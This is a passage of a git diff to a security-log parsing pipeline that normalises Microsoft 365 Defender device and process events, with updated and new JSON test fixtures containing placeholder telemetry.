"createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' + - name: set_process_deviceprocess_events + filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents" or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() not in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' - name: set_alert_evidence_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}' - name: set_alert_info_fields @@ -126,22 +130,6 @@ stages: host.os.full: "{{json_event.message.properties.OSPlatform}}" host.os.version: "{{json_event.message.properties.OSVersion}}" host.type: "{{json_event.message.properties.DeviceType}}" - process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" - process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" - process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" - process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" - process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}" - process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" - process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" - process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" - process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" - process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" - process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" - process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" - process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" - process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" - process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" - process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" registry.data.type: "{{json_event.message.properties.RegistryValueType}}" registry.key: "{{json_event.message.properties.RegistryKey}}" registry.value: "{{json_event.message.properties.RegistryValueName}}" @@ -166,18 +154,6 @@ stages: action.properties.FileOriginReferrerUrl: "{{json_event.message.properties.FileOriginReferrerUrl}}" action.properties.FileOriginUrl: "{{json_event.message.properties.FileOriginUrl}}" action.properties.ISP: "{{json_event.message.properties.ISP or json_event.message.properties.Isp}}" - action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" - action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" - action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" - action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" - action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" - action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" - action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" - action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" - action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" - action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" action.properties.LocalIPType: "{{json_event.message.properties.LocalIPType}}" action.properties.Location: "{{json_event.message.properties.Location}}" action.properties.LogonId: "{{json_event.message.properties.LogonId}}" @@ -250,12 +226,6 @@ stages: - set: user.roles: '["{{json_event.message.properties.AccountType}}"]' filter: '{{json_event.message.properties.get("AccountType")}}' - - set: - process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 0}}' - - set: - process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 0}}' - set: network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' @@ -274,6 +244,98 @@ stages: } filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}' + set_process_events: + actions: + - set: + process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" + process.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" + process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" + action.properties.process.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.process.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.process.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.process.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.process.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}" + action.properties.process.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.process.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + + - set: + process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + + - set: + process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + + set_process_deviceprocess_events: + actions: + - set: + process.parent.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" + process.parent.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" + process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.parent.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.parent.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.parent.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessId}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.pid: "{{json_event.message.properties.ProcessId}}" + process.start: "{{json_event.message.properties.ProcessCreationTime}}" + process.name: "{{json_event.message.properties.FileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine}}" + process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}" + action.properties.process.TokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + action.properties.process.IntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" + action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" + action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" + action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" + action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" + action.properties.process.VersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" + action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" + action.properties.process.parent.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.process.parent.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.process.parent.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.process.parent.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.process.parent.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.process.parent.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.process.parent.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.process.parent.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.process.parent.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.process.parent.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.process.parent.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.process.parent.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + + - set: + process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + + - set: + process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + set_alert_evidence_fields: actions: - set: @@ -356,7 +418,7 @@ stages: event.dataset: "device_events" event.category: ["host"] action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}" - action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + #action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" set_device_file_certificate_info_fields: actions: - set: @@ -469,15 +531,15 @@ stages: - set: event.dataset: "device_process_events" event.category: ["process"] - process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" - process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" - action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" - action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" - action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" - action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" - action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" - action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" - action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" + #process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" + #process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" + #action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" + #action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" + #action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" + #action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" + #action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" + #action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" + #action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" set_device_registry_events_fields: actions: - set: diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json index ca708b0ed..17cad5081 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json new file mode 100644 index 000000000..fedd99aea --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json @@ -0,0 +1,100 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:24.858829Z", + "action": { + "properties": { + "AccountSid": "S-1-2-3", + "process": { + "parent": { + "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "FileSize": 3316224, + "LogonId": "5223047", + "VersionInfoCompanyName": "Test Corporation", + "VersionInfoFileDescription": "Browser EXE", + "VersionInfoInternalFileName": "Browser.EXE", + "VersionInfoOriginalFileName": "Browser.EXE", + "VersionInfoProductName": "Test Product", + "VersionInfoProductVersion": "1, 0, 0, 1" + } + } + }, + "type": "SensitiveFileRead" + }, + "file": { + "directory": "C:\\Log", + "name": "FileName.mdb", + "size": 286720 + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "73291" + } + } + }, + "process": { + "name": "FileName.mdb", + "parent": { + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" + }, + "working_directory": "c:\\program files (x86)" + }, + "working_directory": "C:" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json similarity index 98% rename from Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json rename to Microsoft/microsoft-365-defender/tests/test_device_events_2.json index 1f1351d52..494baa569 100644 --- a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json @@ -16,7 +16,11 @@ "@timestamp": "2024-10-22T15:09:08.851712Z", "action": { "properties": { - "InitiatingProcessLogonId": "0" + "process": { + "parent": { + "LogonId": "0" + } + } }, "type": "ScriptContent" }, @@ -38,10 +42,9 @@ }, "process": { "parent": { - "pid": 0 - }, - "pid": 417271, - "start": "2024-10-22T15:09:08.624070Z" + "pid": 417271, + "start": "2024-10-22T15:09:08.624070Z" + } }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json new file mode 100644 index 000000000..c34cefa50 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json @@ -0,0 +1,83 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft 